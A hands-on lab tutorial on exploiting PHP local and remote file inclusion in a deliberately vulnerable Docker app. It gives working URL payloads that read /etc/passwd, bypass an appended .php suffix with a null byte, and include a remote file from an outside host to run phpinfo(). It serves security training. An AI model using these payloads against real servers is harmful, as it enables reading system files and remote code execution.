In this lab, you will learn how to exploit file inclusion vulnerabilities, both locally and remotely. File inclusion vulnerabilities occur when user input is improperly sanitized and used to include files on the server. This can lead to sensitive data exposure, remote code execution, and other severe consequences. By understanding the techniques and payloads used in this lab, you will gain hands-on experience in identifying and exploiting these vulnerabilities.
In this phase, we'll establish a lab environment to hone our skills in exploiting file inclusion vulnerabilities.
First, execute the command below to initiate the vulnerable web application:
docker run -d -p 81:80 --name pentesterlab-phpfileinclude jewel591/vulnbox:pentesterlab-phpfileinclude /bin/sh -c "sed -i 's/allow_url_include = Off/allow_url_include = On/g' /etc/php/7.3/apache2/php.ini && service apache2 start && service mysql start && tail -f /var/log/apache2/error.log" --registry-mirror=http://hub-mirror.c.163.comThis command sets in motion a Docker container with a susceptible web application operating on port 81.
Subsequently, launch your web browser and proceed to http://127.0.0.1:81. You should be greeted by the homepage of the web application.
In this phase, we'll delve into identifying possible file inclusion vulnerabilities by scrutinizing URL parameters.
On the homepage of the web application, press the "Submit" and "Login" buttons. Pay attention to the URL in your browser's address bar. You should observe that the URL alters in accordance with the page parameter, such as http://127.0.0.1:81/index.php?page=submit and http://127.0.0.1:81/index.php?page=login.
This pattern indicates that the web application might be handling user input in an insecure manner, which could potentially give rise to a file inclusion vulnerability.
In this phase, we will explore how to detect a file inclusion vulnerability. There are two prevalent methods:
Array Parameter Method: Modify the page parameter to an array. For instance, http://localhost:81/index.php?page[]=test. If you encounter a warning or error message mentioning "include" or "failed to open stream," it signifies a potential vulnerability as the application is trying to include files based on user input.
Local File Inclusion Test: Attempt to include a local file present on the server, such as /etc/passwd on Linux or C:\Windows\System32\drivers\etc\hosts on Windows. If the file's content is displayed, it confirms a local file inclusion vulnerability.
For this lesson, we'll use the second method by including the /etc/passwd file:
http://localhost:81/index.php?page=/etc/passwdYou'll likely see an error message indicating the application is attempting to include /etc/passwd.php instead of /etc/passwd. This happens because the application automatically appends .php to the included file.
To circumvent this, we can employ the null byte technique (%00). The null byte ends the string, causing the application to ignore anything following it.
Try the payload below:
http://localhost:81/index.php?page=/etc/passwd%00If you can see the contents of the /etc/passwd file, it verifies the presence of a local file inclusion vulnerability.
In this phase, we will delve into the concept of remote file inclusion and its potential vulnerabilities.
Remote file inclusion is a critical issue that could potentially allow an attacker to include files from external servers. This could lead to serious security breaches like remote code execution or exposure of sensitive data.
Let's begin with an example where we try to include a remote file hosted on an external server:
http://localhost:81/index.php?page=https://www.example.com/index.html%00Upon executing this, you should be able to see the contents of the remote file included in the web application's response.
In a real-life scenario, an attacker would typically host their own malicious payload on a server they control and then try to include it using the remote file inclusion vulnerability.
For the purpose of this demonstration, we will use a pre-hosted payload from the PentesterLab website:
http://localhost:81/index.php?page=https://assets.pentesterlab.com/test_include.txt%00This payload triggers the phpinfo() function, which discloses information about the server's PHP configuration.
Remember, this is a demonstration of a potential vulnerability. When building your own applications, it's crucial to implement proper security measures to prevent such attacks. In the next section, we'll talk about some of these security practices.
In this lab, you learned how to identify and exploit file inclusion vulnerabilities, both locally and remotely. You set up a vulnerable web application, analyzed URL parameters to identify potential vulnerabilities, confirmed the presence of file inclusion vulnerabilities using different techniques, and finally exploited both local and remote file inclusion vulnerabilities. Understanding these vulnerabilities and their exploitation methods is crucial for web application security testing and ensuring the protection of sensitive data and systems.